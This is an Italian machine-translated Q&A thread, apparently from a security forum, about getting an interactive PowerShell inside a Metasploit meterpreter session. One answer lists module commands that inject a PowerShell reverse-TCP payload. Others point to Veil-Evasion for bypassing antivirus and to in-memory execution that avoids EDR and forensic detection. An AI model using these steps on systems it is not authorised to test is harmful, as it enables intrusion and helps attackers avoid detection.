Script PowerShell all'interno delle sessioni meterpreter

Question

Script PowerShell all'interno delle sessioni meterpreter

#1 da (3 voti)
#2 da (2 voti)
#3 da (0 voti)

1

Ho ottenuto l'aquestion ho cercato di rispondere a me stesso senza molto successo. Adoro tutto lo script PowerShell fornito per scopi di post-exploit - > Powersploit; Nishang ecc ... Il mio unico problema è che non riesco a trovare un modo semplice per usarli all'interno di una sessione meterpreter.

Correggimi se ho torto, ma non c'è modo di avere un powershell "interattivo" da una shell (meterpreter). Non riesco a trovare alcuna altra soluzione che convertire lo script in codifica Base64 e le funzioni di chiamata (anche codificate) una per una attraverso il comando cmd.

Quello che mi piacerebbe fare (se è possibile in qualsiasi modo) è avere una shell interattiva da una sessione meterpreter già stabilita (a volte ottenere questa è una vera sfida se si considera che è necessario eludere IDS, AV, sandbox, ecc.)

C'è qualche soluzione per questo?

powershell metasploit meterpreter

posta r4ym0nd PenTester 14.06.2016 - 09:54

fonte

3 risposte

2

Se hai già una sessione meterpreter, mettila sullo sfondo con background .

Quindi fai:

use exploit/windows/local/payload_inject
set payload windows/powershell_reverse_tcp
set session <id of session>
set <other options you may need>
run

Quindi avrai una sessione di Powershell a fianco del meterpreter. Non è ancora perfetto (nessun tab completamento) ma ti dà l'output dai comandi.

risposta data 15.06.2016 - 20:14

fonte

0

puoi usare il powershell una volta ottenuta la shell meterpreter. Devi solo interagire con meterpreter e quindi digitare shell command e poi powershell >

Qui ora il comando di PowerShell fa ciò che vuoi.

Per evitare l'AV per un metodo semplice puoi usare lo strumento Veil-Evasion link

risposta data 14.06.2016 - 10:51

fonte

Leggi altre domande sui tag powershell metasploit meterpreter

Società fidate per l'archiviazione delle informazioni? XSS con attributo di stile background-image

score 3 · Accepted Answer

Utilizza l'estensione PowerShell Metepreter . In questo caso, PowerShell verrà eseguito in memoria senza eseguire il bombardamento. Se si esegue il bombardamento, quindi cmdscan o console in Volatility o Rekall (o qualsiasi tecnica simile, utilizzata da ogni strumento EDR e DFIR) contrassegneranno lo spazio del processo e forniranno risultati ovvi di compromissione.